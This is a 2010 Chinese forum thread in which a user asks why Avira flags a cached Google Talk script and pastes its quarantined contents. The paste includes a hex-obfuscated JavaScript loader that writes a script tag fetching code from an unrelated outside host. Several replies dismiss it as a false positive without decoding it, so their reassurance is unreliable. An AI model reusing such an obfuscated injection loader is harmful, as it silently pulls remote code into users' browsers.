发现病毒或恶意程序!——高手请进

北国游子

真诚、坦荡,狂热、执着,无怨无悔、嫉恶如仇

1楼 大 中 小 发表于 2010-5-8 13:34 只看该作者

发现病毒或恶意程序!——高手请进

8日几乎一整天,小红伞不停拦截:发现病毒或恶意程序!

并提示:包含 HTML/Crypted.Gen HTML 脚本病毒的识别模式

由于出现过于频繁,且均指向同一个位置,经查看,在IE临时文件夹中。但该位置文件无法用任何编辑软件打开,也无法复制。于是先在小红伞中将之隔离,再从隔离区恢复到另一个位置。该文件在IE临时文件夹中名为:116312516-notifierclient-

js_zh-CN[1].VIR

将该文件更名为文本文件,然后打开,内容如下:

var

_0x9713=[“\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x2E\x31\x37\x62\x62\x6A\x2E\x63\x6F\x6D\x2F\x6D\x77\x67\x6E\x64\x66\x61\x2E\x70\x68\x70\x3F\x73\x72\x63\x3D\x67\x67\x26\x74\x3D”,”\x74\x69\x74\x6C\x65”,”\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65”];document_0x9713[0x3];document.write(“<script

language=’javascript’

src=’http://talkgadget.google.com/talkgadget/sp/116312516-notifierclient-

js_zh-CN.js?rr=1886680168’><\/script>”);

将其中地址输入IE地址,执行后显示下载:116312516-notifierclient-js_zh-CN.js

该文件经小红伞扫描没有问题。

该地址主页为:Google Chat - Chat with family and friends

经搜索学习,“.VIR”文件是被杀毒软件标识的文件。那么,病毒程序是116312516-notifierclient-js_zh-

CN.js吗?可该文件小红伞扫描认为没有问题!

我能做的就这些了,希望高手给予指教!!

补充:

点击“发新话题”时,小红伞立刻拦截:发现病毒或恶意程序!

提示同上:包含 HTML/Crypted.Gen HTML 脚本病毒的识别模式

[ 本帖最后由 北国游子 于 2010-5-8 13:40 编辑 ]


Terminusbot 整理,讨论请前往 2049bbs.xyz


核子力量

Twitter.com/hzpower

2楼 大 中 小 发表于 2010-5-8 16:52 只看该作者

进安全模式全盘扫描一遍试试

02304H

10001100000100B

3楼 大 中 小 发表于 2010-5-8 17:01 只看该作者

查了一下,似乎是这个原因:

http://www.llsilver.com/invasion/xiaohongsan-HTML-Crypted.html

实话说这个解决方式挺矛盾的……

要是不扫临时文件夹的话,防护能力可是削弱了不少

还是得请善用伞的人士来讲解下怎么才能单独把这个屏蔽掉

北国游子

真诚、坦荡,狂热、执着,无怨无悔、嫉恶如仇

4楼 大 中 小 发表于 2010-5-9 01:38 只看该作者

原来并不真是病毒!

还真不好解决,排除IE临时文件夹,还真不放心。

每次提示的时候我选择删除或隔离,下面提示就不那么频繁了。但不知道那个JS文件到底是做什么的。

谢谢楼上!

imus

升斗小民

5楼 大 中 小 发表于 2010-5-9 01:42 只看该作者

我提供一个思路:

利用火狐浏览器的adblock plus插件

屏蔽有问题的js或者图片。

狗狗吃肉么浏览器下貌似也有相应的插件……

另外,本人用的是avast!

诺贝尔影帝

6楼 大 中 小 发表于 2010-5-9 08:52 只看该作者

没见过,请问楼主是去什么网站报错的?

按照那个解释“所有的1*1框架和wideth=0的框架”都会报毒,不知道有哪些网站是这样?

而且如此频繁出现,到现在小红伞不可能还在误报吧

我是用了一年多的C版小红伞,在数十台机子装过,但好像都没见过这个问题

北国游子

真诚、坦荡,狂热、执着,无怨无悔、嫉恶如仇

7楼 大 中 小 发表于 2010-5-9 10:13 只看该作者

我同时开着很多窗口,感觉应该就是http://www.google.com.hk/ig?hl=zh-

CN,但谷歌搜索我是默认打开的主页之一,只有那天出现这个情况。

02304H

10001100000100B

8楼 大 中 小 发表于 2010-5-9 10:49 只看该作者

回复 6楼 诺贝尔影帝 的话题

应该是小红伞对恶意网页定义过于宽泛的缘故……

虽然我用小红伞+firefox没有遇到这种情况

现在既然出中文版了, LZ你可以试试咨询官方

或者换avast吧

诺贝尔影帝

9楼 大 中 小 发表于 2010-5-9 16:21 只看该作者

我在ie8试过http://www.google.com.hk/ig?hl=zh-CN

没有任何问题,楼主是ie6?

我倒不觉得小红伞对恶意网页定义宽泛,小红伞被指误报多,主要还是一些破解软件、注册机之类。

高启发是会严格些,不够规范的网页是容易报毒,但不至于对Google的网页也误报吧。

PS:玩过一个小游戏,大丰收,小红伞一定报毒的,为了给老人玩,只有排除掉。

北国游子

真诚、坦荡,狂热、执着,无怨无悔、嫉恶如仇

10楼 大 中 小 发表于 2010-5-9 17:17 只看该作者

我是IE8。

也不确定是http://www.google.com.hk/ig?hl=zh-CN&refresh=1造成的,但小红伞的隔离文件中有这样一段:

encodeURIComponent(document[_0x9713[0x1]])+_0x9713[0x2]);document.write(“<script

language=’javascript’

src=’http://talkgadget.google.com/talkgadget/sp/116312516-notifierclient-

js_zh-CN.js?rr=1886680168’><\/script>”);

哪位高手可以解读

萧易寒

11楼 大 中 小 发表于 2010-5-11 10:45 只看该作者

回复 10楼 北国游子 的话题

有啥好解读的,google的js你还不信任?

库存袈裟

@bruceku 想象力比知识更重要。

12楼 大 中 小 发表于 2010-5-11 15:38 只看该作者

红伞最近误杀严重